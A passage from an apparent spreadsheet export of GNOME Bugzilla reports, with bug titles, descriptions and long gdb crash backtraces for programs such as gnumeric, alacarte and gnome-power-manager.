#14 0x00002aaaaf7b71de in IA__g_object_new_valist (object_type=6028320 
    first_property_name=0x0 var_args=0x7fffffcf70b0) at gobject.c:955
	_cvalue = 
	error = 
	pspec = 
	class = 
	params = 
	name = 
	object = 
	n_params = 
	n_alloced_params = 
	__PRETTY_FUNCTION__ = IA__g_object_new_valist
#15 0x00002aaaaf7b7411 in IA__g_object_new (object_type=6028320 
    first_property_name=0x0) at gobject.c:793
	var_args = {{gp_offset = 16 fp_offset = 48 
    overflow_arg_area = 0x7fffffcf71a0 reg_save_area = 0x7fffffcf70d0}}
	__PRETTY_FUNCTION__ = IA__g_object_new
#16 0x0000000000409322 in gpm_prefs_new () at gpm-prefs-core.c:1050
No locals.
#17 0x00000000004077f8 in main (argc=1 argv=)
    at gpm-prefs.c:104
	verbose = 0
	context = (GOptionContext *) 0x510010
	program = (GnomeProgram *) 0x51d010
	prefs = 
	loop = 
	options = {{long_name = 0x40c5b6 verbose short_name = 0 '\0' 
    flags = 0 arg = G_OPTION_ARG_NONE arg_data = 0x7fffffcf727c 
    description = 0x40c698 Show extra debugging information 
    arg_description = 0x0} {long_name = 0x0 short_name = 0 '\0' flags = 0 
    arg = G_OPTION_ARG_NONE arg_data = 0x0 description = 0x0 
    arg_description = 0x0}}
#0  0x00002aaaafc5c094 in waitpid () from /lib/libpthread.so.0</t>
  </si>
  <si>
    <t>PYSPI-318135</t>
  </si>
  <si>
    <t>PYSPI</t>
  </si>
  <si>
    <t>Improvements to error handling</t>
  </si>
  <si>
    <t>Please describe the problem:
Currently pyspi throws away AT-SPI errors
We should install an error handler callback and use this to raise a Python
exception when errors occur in an AT-SPI call
Steps to reproduce:
1. Run a Dogtail script talking to an application
2. Kill the application or kill at-spi-registryd
Actual results:
Watch various errors scroll by printed to the terminal.
Expected results:
An exception should be raised in Python
Does this happen every time?
Other information:
I attempted to fix this (some stubs are in CVS IIRC) didn't work I think
there's the wrong level of indirection for the callback function pointer which
is confusing Pyrex.
(NB exceptions inside Pyrex get thrown away.  We may need to save the error data
in the callback then check after every C function call if an error state is set)</t>
  </si>
  <si>
    <t>pyspi-maint</t>
  </si>
  <si>
    <t>EVINCE-516237</t>
  </si>
  <si>
    <t>evince problem with image copy</t>
  </si>
  <si>
    <t>The bug has been opened on https://bugs.launchpad.net/ubuntu/+source/evince/+bug/190480
Binary package hint: evince
In a given pdf with two images image1 and image2
when you try to save an image it is always image1 that is save no matter what you try.
http://launchpadlibrarian.net/11919567/tutorial.pdf
tutorial.pdf (724.7 KiB application/pdf)
On page 19 try to save the second image under anything.png.
Good luck!</t>
  </si>
  <si>
    <t>EVOLUTION-316297</t>
  </si>
  <si>
    <t>Evolution help contents fails with error cannot load section</t>
  </si>
  <si>
    <t>Distribution/Version: Sourcemage
Opening the Help contents and it starts listing each section and then it
gets to the end and an error dialog box pops up with 
Could not load section
The section '(null)' does not exist in this document.  If you were
directed to this section from a help button in an application please
report this to the maintainers of that application</t>
  </si>
  <si>
    <t>F-SPOT-400610</t>
  </si>
  <si>
    <t>FolderExport: no longer export pictures in 'export only'</t>
  </si>
  <si>
    <t>probably introduced in r2861</t>
  </si>
  <si>
    <t>MELD-414371</t>
  </si>
  <si>
    <t>meld should remember the state of toggle toolbar buttons</t>
  </si>
  <si>
    <t>there are 5 toggle toolbar buttons at the top of the meld window: flatten modified normal non vc and ignored.
every time meld opens flatten and modified are in the down state. however I usually want flatten off and normal on. so I change them but I must do this almost every time I open meld.
ideally meld would remember the state of these buttons across invocations.
Other information:</t>
  </si>
  <si>
    <t>ryanblazecka</t>
  </si>
  <si>
    <t>YELP-90452</t>
  </si>
  <si>
    <t>priority text padding problems</t>
  </si>
  <si>
    <t>I understand that this is most probably work in progress as there were no
priority text support for icons in the yelp of 2.0.0 but still here are
the problems I found:
Forward should be no priority text as in Galeon and Nautilus.
When opening a yelp window there is some large padding to the left which
shouldn't be there. When changing the Menu and Toolbar Preferences Button
Labels option to text below icons and then back to priority text this
padding is gone but there is some inconsistent padding on the right side of
the buttons and also some inconsistent padding between icon and text.</t>
  </si>
  <si>
    <t>ADWAITA-ICON-THEME-147844</t>
  </si>
  <si>
    <t>make 48x48 version of stock_mail-send-receive.png</t>
  </si>
  <si>
    <t>Needed for ximian bug http://bugzilla.ximian.com/show_bug.cgi?id=26028</t>
  </si>
  <si>
    <t>GDK-PIXBUF-334538</t>
  </si>
  <si>
    <t>better handling of gif animations</t>
  </si>
  <si>
    <t>with the advent of byzanz people start to have big gif animations lying around
and the nautilus thumbnailer happily thumbnails them using gdk_pixbuf_new_from_file(). Unfortunately the load_image method of the gif
loader is rather dumb: it loads the entire animation then takes the first frame of it. 
Here is a patch to stop the loading after the first frame if we know that we are only after a static image.</t>
  </si>
  <si>
    <t>EVOLUTION-239551</t>
  </si>
  <si>
    <t>Evo crash when select the view which is created by user.</t>
  </si>
  <si>
    <t>Please fill in this template when reporting a bug unless you know what you
are doing.
Description of Problem:
Evo crash when select the view which is created by user.
Steps to reproduce the problem:
1. Start evolution and open task component.
2. Click View-&gt;Current View-&gt;Define Views.
3. New a view by yourself such as named by test_view.
4. Click View-&gt;Current View-&gt;test-view.
5. Click View
Actual Results:
Evo crash in Step 4 or step 5.
Expected Results:
It should work normally.
How often does this happen? 
always.
Additional Information:
see the attachment for the backtrace.</t>
  </si>
  <si>
    <t>GNUMERIC-64502</t>
  </si>
  <si>
    <t>Crashes when I paste column of numbers from clipboard</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  gnumeric
Severity: normal
Version:  0.61
Synopsis: Crashes when I paste column of numbers from clipboard
Class:    sw-bug
Distribution: Red Hat Linux release 7.1 (Seawolf)
System: Linux 2.4.2-2 i686 unknown
C library: glibc-2.2.2-10
C compiler: 2.96
glib: 1.2.9
GTK+: 1.2.9
ORBit: ORBit 0.5.7
gnome-libs: gnome-libs 1.2.8
libxml: 1.8.10
gnome-print: gnome-print-0.25-9
gnome-core: gnome-core 1.2.4
Description:
Crashes when I paste column of numbers from clipboard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x407a2519 in __wait4 ()
   from /lib/i686/libc.so.6
#0  0x407a2519 in __wait4 () from /lib/i686/libc.so.6
#1  0x408129e4 in __DTOR_END__ () from /lib/i686/libc.so.6
#2  0x402747e8 in gnome_segv_handle () at eval.c:41
#3  
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
#5  0x0811093d in stf_preview_render () at eval.c:41
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
#8  0x403c12b1 in gtk_marshal_NONE__NONE () at eval.c:41
#9  0x403f4916 in gtk_handlers_run () at eval.c:41
#10 0x403f3c3d in gtk_signal_real_emit () at eval.c:41
#11 0x403f19f5 in gtk_signal_emit () at eval.c:41
#12 0x403913e8 in gtk_editable_insert_text () at eval.c:41
#13 0x40392edf in gtk_entry_set_text () at eval.c:41
#14 0x0810f998 in stf_dialog_format_page_prepare () at eval.c:41
#15 0x403c1188 in gtk_marshal_NONE__POINTER () at eval.c:41
#16 0x403f4916 in gtk_handlers_run () at eval.c:41
#17 0x403f3c3d in gtk_signal_real_emit () at eval.c:41
#18 0x403f19f5 in gtk_signal_emit () at eval.c:41
#19 0x4025bb48 in gnome_druid_page_prepare () at eval.c:41
#20 0x4025ad04 in gnome_druid_set_page () at eval.c:41
#21 0x0810c554 in stf_dialog_set_scroll_region_and_prevent_center ()
    at eval.c:41
#22 0x403c0fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#23 0x403f4916 in gtk_handlers_run () at eval.c:41
#24 0x403f3c3d in gtk_signal_real_emit () at eval.c:41
#25 0x403f19f5 in gtk_signal_emit () at eval.c:41
#26 0x4025ba58 in gnome_druid_page_next () at eval.c:41
#27 0x4025a0f4 in gnome_druid_next_callback () at eval.c:41
#28 0x403c12b1 in gtk_marshal_NONE__NONE () at eval.c:41
#29 0x403f4916 in gtk_handlers_run () at eval.c:41
#30 0x403f3c3d in gtk_signal_real_emit () at eval.c:41
#31 0x403f19f5 in gtk_signal_emit () at eval.c:41
#32 0x40358f2d in gtk_button_clicked () at eval.c:41
#33 0x4035a6ed in gtk_real_button_released () at eval.c:41
#34 0x403c12b1 in gtk_marshal_NONE__NONE () at eval.c:41
#35 0x403f3ac1 in gtk_signal_real_emit () at eval.c:41
#36 0x403f19f5 in gtk_signal_emit () at eval.c:41
#37 0x40358e5d in gtk_button_released () at eval.c:41
#38 0x40359fd7 in gtk_button_button_release () at eval.c:41
#39 0x403c0fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#40 0x403f3c7d in gtk_signal_real_emit () at eval.c:41
#41 0x403f19f5 in gtk_signal_emit () at eval.c:41
#42 0x4042c0e9 in gtk_widget_event () at eval.c:41
#43 0x403c0f15 in gtk_propagate_event () at eval.c:41
#44 0x403bff3f in gtk_main_do_event () at eval.c:41
#45 0x40477e4f in gdk_event_dispatch () at eval.c:41
#46 0x4060a7f3 in g_main_dispatch () at eval.c:41
#47 0x4060add9 in g_main_iterate () at eval.c:41
#48 0x4060af8c in g_main_run () at eval.c:41
#49 0x403bf803 in gtk_main () at eval.c:41
#50 0x0810cdd8 in stf_dialog () at eval.c:41
#51 0x0808c6a5 in gnumeric_create_popup_menu () at eval.c:41
#52 0x0808c934 in gnumeric_create_popup_menu () at eval.c:41
#53 0x403c12dc in gtk_marshal_NONE__POINTER_INT () at eval.c:41
#54 0x403f4916 in gtk_handlers_run () at eval.c:41
#55 0x403f3c3d in gtk_signal_real_emit () at eval.c:41
#56 0x403f1dd9 in gtk_signal_emit_by_name () at eval.c:41
#57 0x403f0afa in gtk_selection_retrieval_report () at eval.c:41
#58 0x403f0780 in gtk_selection_notify () at eval.c:41
#59 0x403c0fbc in gtk_marshal_BOOL__POINTER () at eval.c:41
#60 0x403f3c7d in gtk_signal_real_emit () at eval.c:41
#61 0x403f19f5 in gtk_signal_emit () at eval.c:41
#62 0x4042c0e9 in gtk_widget_event () at eval.c:41
#63 0x403bffe4 in gtk_main_do_event () at eval.c:41
#64 0x40477e4f in gdk_event_dispatch () at eval.c:41
#65 0x4060a7f3 in g_main_dispatch () at eval.c:41
#66 0x4060add9 in g_main_iterate () at eval.c:41
#67 0x4060af8c in g_main_run () at eval.c:41
#68 0x403bf803 in gtk_main () at eval.c:41
#69 0x080663d2 in _start () at eval.c:41
#70 0x08066435 in main () at eval.c:41
#71 0x40704177 in __libc_start_main (main=0x8066420  argc=1 
    ubp_av=0xbffffa7c init=0x8062f5c  fini=0x812fc0c  
    rtld_fini=0x4000e184  stack_end=0xbffffa6c)
    at ../sysdeps/generic/libc-start.c:129
#0  0x407a2519 in __wait4 () from /lib/i686/libc.so.6
No locals.
#1  0x408129e4 in __DTOR_END__ () from /lib/i686/libc.so.6
No symbol table info available.
#2  0x402747e8 in gnome_segv_handle () at eval.c:41
	in eval.c
ap = (void **) 0x8257278
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 136671864
result = 0
#3  
No locals.
#4  0x08110581 in stf_dialog_format_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x8257278
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x0
result = 136671864
result = 0
#5  0x0811093d in stf_preview_render () at eval.c:41
41	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x832a690 
result = 0
result = 137537168
#6  0x0810f3bb in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x0
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x832a690 
result = 0
result = 137537168
#7  0x0810f773 in stf_dialog_fixed_page_init () at eval.c:41
41	in eval.c
ap = (void **) 0x8325788
digval = 4294966784
digval = 4294966784
digval = 4294966784
digval = 4294966784
p = 0x8339b70 \003
result = 137516936
result = 137599856
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-11-13 16:10 -------
The original reporter (jsimon@cvainc.net) of this bug does not have an account here.
Reassigning to the exporter unknown@bugzilla.gnome.org.
Reassigning to the default owner of the component jgoldberg@home.com.
</t>
  </si>
  <si>
    <t>jsimon</t>
  </si>
  <si>
    <t>GSTREAMER-147441</t>
  </si>
  <si>
    <t>typefind recognizes ELF files as audio/mpeg</t>
  </si>
  <si>
    <t>Right click library click Add to Library... select a folder containing an
application (gnome shows them as Type: application/x-executable) and the
application is added to the library. These should be ignored they just play as
noise and caused a couple crashes for me.</t>
  </si>
  <si>
    <t>adam.caldwell</t>
  </si>
  <si>
    <t>VINO-369884</t>
  </si>
  <si>
    <t>Keyboard dose not work correctly with Xsun</t>
  </si>
  <si>
    <t>Please describe the problem:
Most alphabet keys on keyborad dose not work correctly on Sparc platform
Steps to reproduce:
1. Start vino server on a sparc machine
2. connect vino server from a client (java client or vnc viewer)
3. open on terminal
4. try to input something from keyborad
Actual results:
among the alphabet keys only 'e' works. Others don't work.  
Expected results:
every key on keyboard should work
Does this happen every time?
yes
Other information:</t>
  </si>
  <si>
    <t>conny.cheng</t>
  </si>
  <si>
    <t>LIBGDA-482628</t>
  </si>
  <si>
    <t>full example patch</t>
  </si>
  <si>
    <t>Documentation 
Section: 
It is a api update from the main example 
http://library.gnome.org/devel/libgda-3.0/stable/main_example.html
that example uses the old api according to the doc.
Correct version:
See attached document
Other information:</t>
  </si>
  <si>
    <t>PAN-93952</t>
  </si>
  <si>
    <t>pan does not reopen timed out connections</t>
  </si>
  <si>
    <t>Taral  reported the following bug to the Debian BTS:
Package: pan
Version: 0.13.0-4
Severity: important
When a connection times out (503 Timed Out) pan doesn't close the
connection making that connection completely unusable until you restart
pan.
Futher:
&gt; I haven't experienced this problem myself.
&gt; Is there an easy way for me to verify this bug (besides setting up a
&gt; news server of my own or go and read a bunch of code)?
Well easiest way afaict is to set up pan to open 2 connections but keep
1 reserved. Then wait until the server timeout period then try to use
the 2nd connection (say by downloading something big and reading an
article at the same time). It will fail the task that uses the 2nd
connection. After a bit pan does reset the second connection but it
takes several minutes.
Futher details are available at
http://bugs.debian.org/cgi-bin/bugreport.cgi?archive=no\&amp;bug=161594
As far as I can tell a bug similar to this is not currently in the Pan BTS.</t>
  </si>
  <si>
    <t>DIA-336972</t>
  </si>
  <si>
    <t>dia.1 manpage mentions obsolete epsi output format</t>
  </si>
  <si>
    <t>Documentation 
Section: 
The manpage of dia documents epsi als valid output format for the -t option.
However this results in an error message: Can't find output format/filter epsi.
Correct version:
Other information:</t>
  </si>
  <si>
    <t>NEWCOMERS-TUTORIAL-720544</t>
  </si>
  <si>
    <t>NEWCOMERS-TUTORIAL</t>
  </si>
  <si>
    <t>Image not loading</t>
  </si>
  <si>
    <t>mage gnome-image.png found in the source directory is not loaded in the app GUI</t>
  </si>
  <si>
    <t>newcomers-tutorial-maint</t>
  </si>
  <si>
    <t>letter2stalin</t>
  </si>
  <si>
    <t>GOK-118282</t>
  </si>
  <si>
    <t>Compilation error in gok/gok-spy.c - variable declared late</t>
  </si>
  <si>
    <t>In gok/gok-spy.c the variable 'ass' is declared C++ style in the middle of
the function. The error is below:
gok-spy.c: In function `gok_spy_worth_searching':
gok-spy.c:735: parse error before `*'
gok-spy.c:738: `ass' undeclared (first use in this function)
gok-spy.c:738: (Each undeclared identifier is reported only once
gok-spy.c:738: for each function it appears in.)
make[2]: *** [gok-spy.o] Error 1
I am attaching a patch to move the declaration to the top of the function.</t>
  </si>
  <si>
    <t>GNOME-MIME-DATA-84005</t>
  </si>
  <si>
    <t>C++ header file extension incorrect</t>
  </si>
  <si>
    <t>Looks like just a typo. The list of extensions for C++ header files
includes hp which should be hpp.</t>
  </si>
  <si>
    <t>ALACARTE-470103</t>
  </si>
  <si>
    <t>crash in Main Menu: Trying to delete some me...</t>
  </si>
  <si>
    <t xml:space="preserve">Version: 0.11.3
What were you doing when the application crashed?
Trying to delete some menu items installed by Wine.
Distribution: Gentoo Base System release 1.12.9
Gnome Release: 2.18.3 2007-07-20 (Gentoo)
BugBuddy Version: 2.18.1
System: Linux 2.6.22-gentoo-r2 #4 SMP PREEMPT Wed Aug 15 23:36:08 EDT 2007 x86_64
X Vendor: The X.Org Foundation
X Vendor Release: 70200000
Selinux: No
Accessibility: Disabled
GTK+ Theme: Clearlooks-Olive
Icon Theme: gnome
Memory status: size: 182702080 vsize: 182702080 resident: 39960576 share: 23687168 rss: 39960576 rss_rlim: 18446744073709551615
CPU usage: start_time: 1188014512 rtime: 132 utime: 107 stime: 25 cutime:0 cstime: 0 timeout: 0 it_real_value: 0 frequency: 100
Backtrace was generated from '/usr/bin/alacarte'
Using host libthread_db library /lib/libthread_db.so.1.
[Thread debugging using libthread_db enabled]
[New Thread 47354836058336 (LWP 13117)]
0x00002b11a7c42ad5 in __libc_waitpid (pid=13119 stat_loc=0x7fff031b783c 
    options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:32
	in ../sysdeps/unix/sysv/linux/waitpid.c
#0  0x00002b11a7c42ad5 in __libc_waitpid (pid=13119 stat_loc=0x7fff031b783c 
    options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:32
#1  0x00002aaaad3eaea0 in libgnomeui_segv_handle (signum=11)
    at gnome-ui-init.c:872
#2  
#3  gmenu_tree_ref (tree=0x0) at gmenu-tree.c:656
#4  0x00002aaaab944f92 in pygmenu_tree_directory_get_tree (
    self=0x2aaaaf3be0a8 args=0xb97d80) at gmenu.c:419
#5  0x00002b11a7a98711 in PyEval_EvalFrame (f=0x8fb730) at Python/ceval.c:1957
#6  0x00002b11a7a9c9bc in PyEval_EvalCodeEx (co=0x2aaaaf030110 
    globals= locals= 
    args=0x2aaaaf3963b0 argcount=2 kws=0x830540 kwcount=0 
    defs=0x2aaaaf3963a8 defcount=1 closure=0x0) at Python/ceval.c:2741
#7  0x00002b11a7a9a879 in PyEval_EvalFrame (f=0x830380) at Python/ceval.c:3661
#8  0x00002b11a7a9a91c in PyEval_EvalFrame (f=0x8987d0) at Python/ceval.c:3651
#9  0x00002b11a7a9c9bc in PyEval_EvalCodeEx (co=0x2b11a7997f80 
    globals= locals= 
    args=0x2aaaaf3b6f50 argcount=2 kws=0x0 kwcount=0 defs=0x0 
    defcount=0 closure=0x0) at Python/ceval.c:2741
#10 0x00002b11a7a573c3 in function_call (func=0x2aaaaf3a4758 
    arg=0x2aaaaf3b6f38 kw=0x0) at Objects/funcobject.c:548
#11 0x00002b11a7a413b0 in PyObject_Call (func=0x0 arg=0x0 kw=0x2b11a79a2084)
    at Objects/abstract.c:1795
#12 0x00002b11a7a4735c in instancemethod_call (func= 
    arg=0x2aaaaf3b6f38 kw=0x0) at Objects/classobject.c:2532
#13 0x00002b11a7a413b0 in PyObject_Call (func=0x0 arg=0x0 kw=0x2b11a79a2084)
    at Objects/abstract.c:1795
#14 0x00002b11a7a96a3c in PyEval_CallObjectWithKeywords (func=0x2aaaaf0021e0 
    arg=0x2b11a799b250 kw=0x0) at Python/ceval.c:3435
#15 0x00002b11a8339265 in ?? ()
   from /usr/lib64/python2.4/site-packages/gtk-2.0/gobject/_gobject.so
#16 0x00002b11a847b0c9 in IA__g_closure_invoke (closure=0xbb10e0 
    return_value=0x0 n_param_values=1 param_values=0x7fff031b8a20 
    invocation_hint=0x7fff031b88f0) at gclosure.c:490
#17 0x00002b11a848ae81 in signal_emit_unlocked_R (node=0x999850 detail=0 
    instance=0x99e2d0 emission_return=0x0 
    instance_and_params=0x7fff031b8a20) at gsignal.c:2440
#18 0x00002b11a848c135 in IA__g_signal_emit_valist (instance=0x99e2d0 
    signal_id= detail=0 var_args=0x7fff031b8ca0)
    at gsignal.c:2199
#19 0x00002b11a848c313 in IA__g_signal_emit (instance=0x0 signal_id=0 
    detail=2811895940) at gsignal.c:2243
#20 0x00002b11a8f102ba in IA__gtk_widget_activate (widget=0x99e2d0)
    at gtkwidget.c:3946
#21 0x00002b11a8e1e5b0 in IA__gtk_menu_shell_activate_item (
    menu_shell=0x97c080 menu_item=0x99e2d0 
    force_deactivate=) at gtkmenushell.c:1024
#22 0x00002b11a8e1fa60 in gtk_menu_shell_button_release (widget=0x97c080 
    event=0xbabaa0) at gtkmenushell.c:630
#23 0x00002b11a8e1280d in _gtk_marshal_BOOLEAN__BOXED (closure=0x95c660 
    return_value=0x7fff031b8fa0 n_param_values= 
    param_values=0x7fff031b9090 invocation_hint= 
    marshal_data=0x2b11a8e17f20) at gtkmarshalers.c:84
#24 0x00002b11a847b0c9 in IA__g_closure_invoke (closure=0x95c660 
    return_value=0x7fff031b8fa0 n_param_values=2 
    param_values=0x7fff031b9090 invocation_hint=0x7fff031b8f60)
    at gclosure.c:490
#25 0x00002b11a848b01f in signal_emit_unlocked_R (node=0x95c6d0 detail=0 
    instance=0x97c080 emission_return=0x7fff031b92b0 
    instance_and_params=0x7fff031b9090) at gsignal.c:2478
#26 0x00002b11a848befe in IA__g_signal_emit_valist (instance=0x97c080 
    signal_id= detail=0 var_args=0x7fff031b9310)
    at gsignal.c:2209
#27 0x00002b11a848c313 in IA__g_signal_emit (instance=0x0 signal_id=0 
    detail=2811895940) at gsignal.c:2243
#28 0x00002b11a8f0c60e in gtk_widget_event_internal (widget=0x97c080 
    event=0xbabaa0) at gtkwidget.c:3915
#29 0x00002b11a8e0bdde in IA__gtk_propagate_event (widget=0x97c080 
    event=0xbabaa0) at gtkmain.c:2341
#30 0x00002b11a8e0ce47 in IA__gtk_main_do_event (event=0xbabaa0)
    at gtkmain.c:1575
#31 0x00002b11a91a444c in gdk_event_dispatch (source= 
    callback= user_data=)
    at gdkevents-x11.c:2318
#32 0x00002b11a86e2643 in IA__g_main_context_dispatch (context=0x729470)
    at gmain.c:2045
#33 0x00002b11a86e548d in g_main_context_iterate (context=0x729470 block=1 
    dispatch=1 self=) at gmain.c:2677
#34 0x00002b11a86e5776 in IA__g_main_loop_run (loop=0xc1c580) at gmain.c:2881
#35 0x00002b11a8e0d1a2 in IA__gtk_main () at gtkmain.c:1154
#36 0x00002b11a8a8b704 in _wrap_gtk_main (self=)
    at ./gtk.override:1133
#37 0x00002b11a7a9b880 in PyEval_EvalFrame (f=0x53dd80) at Python/ceval.c:3552
#38 0x00002b11a7a9a91c in PyEval_EvalFrame (f=0x55a7e0) at Python/ceval.c:3651
#39 0x00002b11a7a9a91c in PyEval_EvalFrame (f=0x504770) at Python/ceval.c:3651
#40 0x00002b11a7a9c9bc in PyEval_EvalCodeEx (co=0x2b11a7992880 
    globals= locals= args=0x0 
    argcount=0 kws=0x0 kwcount=0 defs=0x0 defcount=0 closure=0x0)
    at Python/ceval.c:2741
#41 0x00002b11a7a9cae2 in PyEval_EvalCode (co=0x0 globals=0x0 
    locals=0x2b11a79a2084) at Python/ceval.c:484
#42 0x00002b11a7ab7369 in run_node (n= 
    filename= globals=0x502650 locals=0x502650 
    flags=) at Python/pythonrun.c:1285
#43 0x00002b11a7ab87e8 in PyRun_SimpleFileExFlags (fp= 
    filename=0x7fff031bb172 /usr/bin/alacarte closeit=1 
    flags=0x7fff031b9ea0) at Python/pythonrun.c:869
#44 0x00002b11a7abea08 in Py_Main (argc= 
    argv=0x7fff031b9fc8) at Modules/main.c:493
#45 0x00002b11a80c9374 in __libc_start_main (main=0x4007b0  argc=3 
    ubp_av=0x7fff031b9fc8 init= 
    fini= rtld_fini= 
    stack_end=0x7fff031b9fb8) at libc-start.c:238
#46 0x0000000000400719 in _start ()
Thread 1 (Thread 47354836058336 (LWP 13117)):
#0  0x00002b11a7c42ad5 in __libc_waitpid (pid=13119 stat_loc=0x7fff031b783c 
    options=0) at ../sysdeps/unix/sysv/linux/waitpid.c:32
	oldtype = 
	result = 
#1  0x00002aaaad3eaea0 in libgnomeui_segv_handle (signum=11)
    at gnome-ui-init.c:872
	estatus = 10922
	sa = {__sigaction_handler = {sa_handler = 0 sa_sigaction = 0} 
  sa_mask = {__val = {0 1928440316353 1803886264481 0 
      18446744073709551615 44 47354834243886 1928440316380 1984274890913 
      0 0 12879632 46912503239780 44 47354834243886 46912503303104}} 
  sa_flags = -1424471092 sa_restorer = 0}
	pid = -512
	in_segv = 1
#2  
No symbol table info available.
#3  gmenu_tree_ref (tree=0x0) at gmenu-tree.c:656
No locals.
#4  0x00002aaaab944f92 in pygmenu_tree_directory_get_tree (
    self=0x2aaaaf3be0a8 args=0xb97d80) at gmenu.c:419
	tree = 
	retval = 
#5  0x00002b11a7a98711 in PyEval_EvalFrame (f=0x8fb730) at Python/ceval.c:1957
	d = 
	hash = 
	stack_pointer = (PyObject **) 0x8fb8d0
	next_instr = (unsigned char *) 0x2aaaaf023691 i\003
	opcode = 
	oparg = 
	why = WHY_NOT
	err = 0
	x = 
	v = 
	w = 
	u = (PyObject *) 0x8fb8d0
	t = 
	stream = (PyObject *) 0x2b11a79a3030
	fastlocals = (PyObject **) 0x8fb8b8
	freevars = (PyObject **) 0x8fb8d0
	retval = (PyObject *) 0x0
	tstate = (PyThreadState *) 0x5012d0
	co = (PyCodeObject *) 0x2aaaaf030110
	instr_ub = -1
	instr_lb = 9418960
	instr_prev = -1
	first_instr = 
	names = (PyObject *) 0x2aaaaf02d1d0
	consts = (PyObject *) 0x2aaaaf000998
#6  0x00002b11a7a9c9bc in PyEval_EvalCodeEx (co=0x2aaaaf030110 
    globals= locals= 
    args=0x2aaaaf3963b0 argcount=2 kws=0x830540 kwcount=0 
    defs=0x2aaaaf3963a8 defcount=1 closure=0x0) at Python/ceval.c:2741
	m = 2
	f = (PyFrameObject *) 0x8fb730
	retval = 
	fastlocals = (PyObject **) 0x8fb8b8
	freevars = (PyObject **) 0x8fb8d0
	tstate = (PyThreadState *) 0x5012d0
	x = 
	u = 
#7  0x00002b11a7a9a879 in PyEval_EvalFrame (f=0x830380) at Python/ceval.c:3661
	callargs = 
	sp = (PyObject **) 0x830540
	stack_pointer = 
	next_instr = (unsigned char *) 0x2aaaaf023588 |\003
	opcode = 
	oparg = 
	why = 
	err = 0
	x = 
	v = 
	w = 
	u = 
	t = 
	stream = (PyObject *) 0x1d
	fastlocals = (PyObject **) 0x830508
	freevars = (PyObject **) 0x830528
	retval = (PyObject *) 0x0
	tstate = (PyThreadState *) 0x5012d0
	co = (PyCodeObject *) 0x2aaaaf026c70
	instr_ub = -1
	instr_lb = 
	instr_prev = -1
	first_instr = 
	names = (PyObject *) 0x2aaaaeaacd98
	consts = (PyObject *) 0x2aaaaf022d90
#8  0x00002b11a7a9a91c in PyEval_EvalFrame (f=0x8987d0) at Python/ceval.c:3651
	f = (PyFrameObject *) 0x830380
	tstate = (PyThreadState *) 0x5012d0
	stack = (PyObject **) 0x2b11a79a2084
	i = 0
	stack_pointer = 
	next_instr = (unsigned char *) 0x2b11a79521e2 \001n+
	opcode = 
	oparg = 
	why = 
	err = 0
	x = (PyObject *) 0x0
	v = 
	w = 
	u = 
	t = 
	stream = (PyObject *) 0x1
	fastlocals = (PyObject **) 0x898958
	freevars = (PyObject **) 0x898988
	retval = (PyObject *) 0x0
	tstate = (PyThreadState *) 0x5012d0
	co = (PyCodeObject *) 0x2b11a7997f80
	instr_ub = -1
	instr_lb = 
	instr_prev = -1
	first_instr = 
	names = (PyObject *) 0x2b11a795d820
	consts = (PyObject *) 0x2b11a7994640
#9  0x00002b11a7a9c9bc in PyEval_EvalCodeEx (co=0x2b11a7997f80 
    globals= locals= 
    args=0x2aaaaf3b6f50 argcount=2 kws=0x0 kwcount=0 defs=0x0 
    defcount=0 closure=0x0) at Python/ceval.c:2741
	m = 2
	f = (PyFrameObject *) 0x8987d0
	retval = 
	fastlocals = (PyObject **) 0x898958
	freevars = (PyObject **) 0x898988
	tstate = (PyThreadState *) 0x5012d0
	x = 
	u = 
#10 0x00002b11a7a573c3 in function_call (func=0x2aaaaf3a4758 
    arg=0x2aaaaf3b6f38 kw=0x0) at Objects/funcobject.c:548
	pos = 
	i = 
	result = 
	argdefs = 
	d = (PyObject **) 0x0
	k = 
	nk = 
	nd = 0
#11 0x00002b11a7a413b0 in PyObject_Call (func=0x0 arg=0x0 kw=0x2b11a79a2084)
    at Objects/abstract.c:1795
	result = 
	call = (ternaryfunc) 0xb97d80
#12 0x00002b11a7a4735c in instancemethod_call (func= 
    arg=0x2aaaaf3b6f38 kw=0x0) at Objects/classobject.c:2532
	clsbuf = `\205Â¨\021+\000\000|oDÂ¨\021+\000\000 \212\033\003Ã¿\177\000\000Ã€Ã´lÂ¨\021+\000\0006 '\0'  ÃÃ¢\231\000\000\000\000\000\001\000\000\000\000\000\000\000Ã \020Â»\000\000\000\000\000Ãª-3Â¨\021+\000\000 \212\033\003Ã¿\177\000\000\000\000\000\000\000\000\000\000PÂ²\231Â§\021+\000\000Ã \020Â»\000\000\000\000\000\001\000\000\000\000\000\000\000Â¯x3Â¨\021+\000\000\230\024q '\0'  \200Ã¦p\000\000\000\000\000Â \003`\003\000\000\000\000Â \226Ã‡\000\000\000\000\000\230Ã¦p '\0'  `\230GÂ¨\021+\000\000\t\214Ã‡Âª\021+\000\000\000\000\000\000\000\000\000\000\200Ã¦p...
